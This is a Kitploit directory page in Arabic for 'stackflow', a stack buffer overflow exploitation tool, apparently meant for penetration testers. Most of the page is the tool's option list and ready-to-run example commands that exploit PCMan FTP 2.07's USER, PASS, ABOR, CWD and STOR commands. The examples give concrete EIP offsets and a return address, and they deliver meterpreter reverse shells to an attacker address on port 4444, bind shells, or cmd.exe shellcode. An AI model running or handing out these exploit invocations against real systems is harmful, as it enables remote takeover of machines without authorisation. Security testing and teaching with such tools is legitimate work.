Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
stackflow — أداة شاملة لاستغلال تجاوز سعة المخزن المؤقت القائم على المكدس | Kitploit
أدوات/GitHubGitHub/d4rkcat/stackflow
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كودمصممي الأخطاءالاختبار العشوائياختبار الاختراقاستغلال الملفات الثنائية
GitHubd4rkcat/stackflow

stackflow

أداة شاملة لاستغلال تجاوز سعة المخزن المؤقت القائم على المكدس

عرض المستودع
238منذ 12 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

stackflow

أداة استغلال تجاوز سعة المخزن المؤقت القائمة على المكدس عالمية

الاستخدام

root@kitploit:~
usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        rhost
  -p RPORT, --rport RPORT
                        rport
  -c CMDS, --cmds CMDS  commands to send to server before overflow
  -v VULNCMD, --vulncmd VULNCMD
                        vulnerable command
  -o OFFSET, --offset OFFSET
                        offset to EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        calculate offset from cyclic pattern EIP string
  -a RETURNADD, --returnadd RETURNADD
                        return address
  -n NOPS, --nops NOPS  number of NOPS \x90 x 4 to prepend
  -m PAYLOAD, --payload PAYLOAD
                        MSF payload
  -i LHOST, --lhost LHOST
                        lhost
  -l LPORT, --lport LPORT
                        lport
  -f FUZZ, --fuzz FUZZ  Fuzz with cyclic pattern of size
  -t, --calc            Send calc.exe shellcode
  -t1, --cmdprompt      Send cmd.exe shellcode
  -d, --display         Display the exploit buffer
  -q, --quiet           Display less cruft
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout for socket (Default: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Export exploit config and metasploit rc file
  -g CFIMPORT, --cfimport CFIMPORT
                        Import and run exploit from config file
  -s STANDALONE, --standalone STANDALONE
                        Export exploit to a standalone python script

يمكن إدخال جميع الخيارات عبر سطر الأوامر أو قراءتها من ملف إعدادات.

بعض الأمثلة لـ PCMan FTP 2.07 الذي يعمل على WindowsXP SP3 (ENG):

التطبيق الضعيف: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

استغلال بدون أي أوامر وإرسال شيلكود meterpreter/reverse_tcp يعود إلى 192.168.0.2 على المنفذ 4444:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

استغلال أمر USER وإرسال شيلكود meterpreter/reverse_tcp يعود إلى 192.168.0.2 على المنفذ 4444:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

استغلال أمر PASS وإرسال شيلكود calc.exe:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous' -a 7E429353 -t

استغلال أمر ABOR وإرسال شيلكود meterpreter/bind_tcp يستمع على المنفذ 4444:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

استغلال أمر CWD وإرسال شيلكود cmd.exe وعرض مخزن الاستغلال المؤقت:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

تشويش أمر STOR بمخزن مؤقت دوري بحجم 3000:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

استغلال أمر CWD بسلسلة إزاحة تلقائية من EIP بعد تعطل التشويش وإرسال شيلكود cmd.exe:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1

تصدير ملف الاستغلال py وملف metasploit rc:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

تشغيل msfconsole وتشغيل الاستغلال والمعالج:

root@kitploit:~
msfconsole -r revCWD.rc

تشغيل الاستغلال والمعالج من msfconsole:

root@kitploit:~
resource /path/to/revCWD.rc

تشغيل استغلال من ملف إعدادات (بدون معالج!):

root@kitploit:~
./stackflow.py -g revCWD(.py)
تنزيل الأداة